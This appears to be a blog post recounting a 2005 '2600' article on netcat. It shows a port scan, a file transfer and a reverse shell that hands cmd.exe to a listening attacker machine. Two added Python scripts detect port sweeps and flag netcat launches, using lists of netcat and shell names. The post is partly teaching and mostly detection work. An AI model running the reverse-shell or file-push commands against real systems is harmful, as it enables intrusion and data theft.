While I was going through my notes, I came across a topic that was originally published in "2600: The Hacker Quarterly", Spring 2005, Volume 22.
Port scanning: this port scanning method could be as fast as nmap.
nc -v -r -w3 -z target port1-portn
-v = verbose output
-r = randomize the order in which the listed ports are tried
-w = timeout in seconds for each connection attempt
-z = zero-I/O mode: connect and report the result, but send no data over the TCP connection
$ nc -v -r -z -w3 192.168.0.200 10-100
win2k3.example.com [192.168.0.200] 80 (www) open
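From the defender's side the scan above leaves a trace: every port tried is a connection attempt against the target, whether or not anything answered, and -r only changes the order in which they arrive. The following added example (mine, not from the post or the 2600 article) parses constructed firewall-style log lines and flags any source that touches many distinct ports on one host within a short window; the log format, the threshold and the window size are assumptions.

```python
"""Flag netcat-style port sweeps in connection logs (added example, not from the post)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in a simplified netfilter-style format, one per inbound
# TCP connection attempt that reached the host. Addresses follow the post's example.
SAMPLE_LOG = """\
2005-04-02T10:00:00 SRC=192.168.0.3 DST=192.168.0.200 PROTO=TCP DPT=80 SYN
2005-04-02T10:00:01 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=37 SYN
2005-04-02T10:00:01 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=80 SYN
2005-04-02T10:00:01 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=21 SYN
2005-04-02T10:00:02 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=99 SYN
2005-04-02T10:00:02 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=45 SYN
2005-04-02T10:00:02 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=22 SYN
2005-04-02T10:00:03 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=13 SYN
2005-04-02T10:00:03 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=66 SYN
2005-04-02T10:00:03 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=25 SYN
2005-04-02T10:00:04 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=71 SYN
2005-04-02T10:00:04 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=19 SYN
2005-04-02T10:00:05 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=88 SYN
2005-04-02T10:00:09 SRC=192.168.0.3 DST=192.168.0.200 PROTO=TCP DPT=80 SYN
2005-04-02T10:30:00 SRC=192.168.0.90 DST=192.168.0.200 PROTO=TCP DPT=80 SYN
"""

LINE_RE = re.compile(r"^(\S+) SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+)")


def parse_connections(log_text):
    """Group (timestamp, dst_port) attempts by (src, dst); lines that do not match are skipped."""
    by_pair = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, dst, port = m.groups()
        by_pair[(src, dst)].append((datetime.fromisoformat(ts), int(port)))
    return by_pair


def detect_sweeps(log_text, window_seconds=60, min_ports=10):
    """Return one alert per (src, dst) pair that touched at least min_ports distinct
    ports inside any span of window_seconds. Counting distinct ports rather than
    checking for a sequential order means -r (random port order) does not hide the sweep."""
    alerts = []
    for (src, dst), attempts in parse_connections(log_text).items():
        attempts.sort()
        window = deque()
        for ts, port in attempts:
            window.append((ts, port))
            # drop attempts that fell out of the sliding window
            while (ts - window[0][0]).total_seconds() > window_seconds:
                window.popleft()
            ports = {p for _, p in window}
            if len(ports) >= min_ports:
                alerts.append({"src": src, "dst": dst,
                               "first": window[0][0].isoformat(),
                               "last": ts.isoformat(),
                               "ports": sorted(ports)})
                break  # one alert per pair is enough; later hits belong to the same sweep
    return alerts


if __name__ == "__main__":
    for a in detect_sweeps(SAMPLE_LOG):
        print(f"sweep: {a['src']} -> {a['dst']} ({len(a['ports'])} ports, "
              f"{a['first']}..{a['last']})")
```

The threshold fires at the tenth distinct port, so the alert carries the ports seen up to that moment; the lone connection half an hour later from the same source is outside the window and does not add to it.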
File transfer: this requires netcat to be installed on both machines (it works for both text and binary files).
Receiving machine (listens and writes the incoming bytes to a file):
$ nc -l -p port > file
Sending machine (reads the file and pushes it to the listener):
$ nc -w3 target port < file
nc.exe -l -p 2112 > file
$ nc -w3 192.168.0.90 2112 < lab.php
Shovel the Shell…
This is one of the most interesting uses of netcat: here netcat is used to get a command prompt on the remote machine. Think of it as a reverse shell.
Attack machine syntax:
nc -vv -l -p port
Target machine syntax:
nc -e path_to_prog host port
$ nc -vv -l -p 2112
listening on [any] 2112 …
nc.exe -e cmd.exe 192.168.0.3 2112
Back to the Attacker machine…
connect to [192.168.0.3] from (UNKNOWN) [192.168.0.90] 23657
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
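Seen from the target, the shoveled shell above is just a process launch: nc.exe started with -e and the name of a shell. The following added example (mine, not from the post) reads constructed process-creation records covering the three uses shown in this post (the -z scan, the -l -p listener and the -e shell) and ranks each one; the record format, the list of netcat binary names and the list of shell names are assumptions.

```python
"""Rank netcat launches found in process-creation logs (added example, not from the post)."""
import re
import shlex

# Constructed sample events in a simplified Sysmon/auditd-like format, one process
# launch per line. Hosts and addresses follow the post's examples.
SAMPLE_LOG = r"""
2005-04-02T10:05:12 host=win2k3 user=lab image=C:\tools\nc.exe cmdline="nc.exe -e cmd.exe 192.168.0.3 2112"
2005-04-02T10:05:01 host=attacker user=root image=/usr/bin/nc cmdline="nc -vv -l -p 2112"
2005-04-02T10:00:00 host=attacker user=root image=/usr/bin/nc cmdline="nc -v -r -z -w3 192.168.0.200 10-100"
2005-04-02T10:02:30 host=win2k3 user=lab image=C:\WINDOWS\notepad.exe cmdline="notepad.exe lab.txt"
2005-04-02T10:03:00 host=attacker user=root image=/usr/bin/nc cmdline="nc -w3 192.168.0.90 2112"
"""

EVENT_RE = re.compile(r'^(\S+) host=(\S+) user=(\S+) image=(\S+) cmdline="([^"]*)"$')
# Assumed binary names; a renamed copy defeats this check, so pair it with
# hash or signer matching in a real deployment.
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "sh", "bash", "dash", "zsh"}


def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def parse_netcat_args(argv):
    """Expand clustered flags (-vv, -lp) and pull out the -e program and the -p port."""
    flags, exec_target, listen_port = set(), None, None
    i = 1
    while i < len(argv):
        tok = argv[i]
        if len(tok) > 1 and tok[0] == "-" and tok[1] != "-":
            letters = tok[1:]
            for j, ch in enumerate(letters):
                if ch.isalpha():
                    flags.add(ch)
                if ch in "ep":  # -e and -p take a value, attached or as the next token
                    value = letters[j + 1:]
                    if not value and i + 1 < len(argv):
                        i += 1
                        value = argv[i]
                    if ch == "e":
                        exec_target = value or None
                    else:
                        listen_port = value or None
                    break
        i += 1
    return flags, exec_target, listen_port


def assess_event(line):
    """Return a finding dict for a netcat launch, or None for any other process."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ts, host, user, image, cmdline = m.groups()
    argv = shlex.split(cmdline)
    if not argv or (basename(image) not in NETCAT_NAMES
                    and basename(argv[0]) not in NETCAT_NAMES):
        return None
    flags, exec_target, listen_port = parse_netcat_args(argv)
    positional = [a for a in argv[1:] if not a.startswith("-")]
    if exec_target:
        severity = "high" if basename(exec_target) in SHELLS else "medium"
        reason = (f"netcat -e executes {exec_target} over the connection "
                  f"(shell shoveled to {' '.join(positional[-2:])})")
    elif "l" in flags:
        severity = "medium"
        reason = (f"netcat listener on port {listen_port or 'unknown'} "
                  f"(receives a file or an inbound shell)")
    elif "z" in flags:
        severity = "low"
        reason = f"zero-I/O probe of {' '.join(positional)} (port scan)"
    else:
        severity = "info"
        reason = f"outbound netcat connection to {' '.join(positional[-2:])}"
    return {"time": ts, "host": host, "user": user,
            "severity": severity, "reason": reason}


def scan_process_log(log_text):
    """Assess every record and return the findings in time order."""
    findings = [f for f in (assess_event(l) for l in log_text.splitlines()) if f]
    return sorted(findings, key=lambda f: f["time"])


if __name__ == "__main__":
    for f in scan_process_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']:<9} {f['severity']:<6} {f['reason']}")
```

The -e launch ranks highest because the program it names is handed the socket directly; the listener and the probe are ranked lower on their own, but the three records together reproduce the whole sequence in this post, so correlating them by address and time is the natural next step for a detection rule.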